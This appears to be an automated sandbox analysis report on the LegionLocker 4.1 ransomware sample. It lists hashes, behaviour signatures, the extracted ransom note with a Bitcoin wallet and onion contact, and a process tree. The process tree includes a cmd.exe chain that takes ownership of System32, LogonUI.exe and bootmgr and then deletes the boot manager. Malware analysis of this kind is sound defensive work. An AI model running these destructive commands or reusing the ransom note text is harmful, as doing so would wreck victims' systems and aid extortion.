Overview

overview

10

Static

static

10

LegionLocker4.1.exe

windows7_x64

10

LegionLocker4.1.exe

windows10_x64

10

Resubmissions

26-07-2021 04:39

210726-yf4zy28y4a 10

26-07-2021 03:48

210726-xhrfp51ttx 10

Analysis

  • max time kernel
    150s
  • max time network
    136s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    26-07-2021 03:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    LegionLocker4.1.exe

  • Size

    6.1MB

  • MD5

    04df8dd30da8b5853f48cc1ac9b695a8

  • SHA1

    4c02262c2fea0e99277a99dcbe28a9c370b87c39

  • SHA256

    78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201

  • SHA512

    3ad10c1512e316ff9d02bd5b4573298ae2f6fc8f9d56c66e2c5c4d95fe046e5b14b09e63cea9bca778560ce4b568ebdf70d66a0225b2eaf7e6cd3ba914583b7e

Score
10/10
discoveryevasionexploitpersistenceransomwarespywarestealer

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt

Ransom Note
Ooops! All your important files are encrypted! What happend to my computer? All your important files are encrypted. No one can help you to restore files without our special decryptor. Backups were either encrypted or deleted. Shadow copies also removed. If you want to restore some of your files for free write to email (contact is below) and attach 2-3 encrypted files. You will receive decrypted samples. To decrypt other files you have to pay $50. How do i pay? Payment is accepted in Bitcoin only. Please check the current price of Bitcoin and buy some Bitcoins. And send the correct amount to the address specified at the bottom of the sheet. Contact: 1.Download Tor browser (https://www.torproject.org/) 2.Create account on mail2tor (http://mail2tor2zyjdctd.onion/) 3.Write email to us ([email protected]) In case of no anwser in 72 hours write us to this email: [email protected] What if i already paid? Send your Bitcoin wallet ID to e-mail provided above. Attention! 1.Do not modify encrypted files. 2.Do not try decrypt your data using third party software, it may cause pernament data loss. Our Bitcoin address: 131fjhrB4wH8j6adZXudp1Wn23pR33tpAh
Wallets

131fjhrB4wH8j6adZXudp1Wn23pR33tpAh

URLs

http://mail2tor2zyjdctd.onion/

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Disables Task Manager via registry modification
    evasion
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Possible privilege escalation attempt 8 IoCs
    exploit
  • Modifies file permissions 1 TTPs 8 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\LegionLocker4.1.exe
    "C:\Users\Admin\AppData\Local\Temp\LegionLocker4.1.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:580
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1920
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2368
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32 /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2696
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\drivers
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:3888
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\drivers /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:188
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\LogonUI.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1088
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\LogonUI.exe /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1416
      • C:\Windows\system32\takeown.exe
        takeown /f C:\bootmgr
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2236
      • C:\Windows\system32\icacls.exe
        icacls C:\bootmgr /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:3796
      • C:\Windows\system32\attrib.exe
        attrib -s -r -h C:\bootmgr
        3⤵
        • Views/modifies file attributes
        PID:4060
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1224
      • C:\Windows\system32\rundll32.exe
        rundll32 user32.dll,UpdatePerUserSystemParameters
        3⤵
          PID:2728
      • C:\Windows\system32\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:2208
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:4064

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
        MD5

        7db09a04d53ec49b19596d7836ac2286

        SHA1

        f92b734a6fd58d4a729d14f32bd69d588d03fb70

        SHA256

        eb07471b556a3a18b04c9f14d98f0d8345f6a249a74eea2148af19b50c97c5e7

        SHA512

        fc597891e55cfd69aaf709d20f89c088c6e4632a0f1b3286aaee2d22f98a7f01aaff1f8ec2660086f3434a02d4ea9fa0a5df60eac95abe9be56be8aee6d92897

        Download Submit

      • memory/188-121-0x0000000000000000-mapping.dmp

        Download

      • memory/580-114-0x0000000000120000-0x0000000000121000-memory.dmp

        Filesize

        4KB

        Download

      • memory/580-116-0x000000001B5E0000-0x000000001B5E2000-memory.dmp

        Filesize

        8KB

        Download

      • memory/580-132-0x000000001B5E4000-0x000000001B5E6000-memory.dmp

        Filesize

        8KB

        Download

      • memory/580-131-0x000000001B5E2000-0x000000001B5E4000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1088-122-0x0000000000000000-mapping.dmp

        Download

      • memory/1224-127-0x0000000000000000-mapping.dmp

        Download

      • memory/1416-123-0x0000000000000000-mapping.dmp

        Download

      • memory/1920-117-0x0000000000000000-mapping.dmp

        Download

      • memory/2208-129-0x0000000000000000-mapping.dmp

        Download

      • memory/2236-124-0x0000000000000000-mapping.dmp

        Download

      • memory/2368-118-0x0000000000000000-mapping.dmp

        Download

      • memory/2696-119-0x0000000000000000-mapping.dmp

        Download

      • memory/2728-128-0x0000000000000000-mapping.dmp

        Download

      • memory/3796-125-0x0000000000000000-mapping.dmp

        Download

      • memory/3888-120-0x0000000000000000-mapping.dmp

        Download

      • memory/4060-126-0x0000000000000000-mapping.dmp

        Download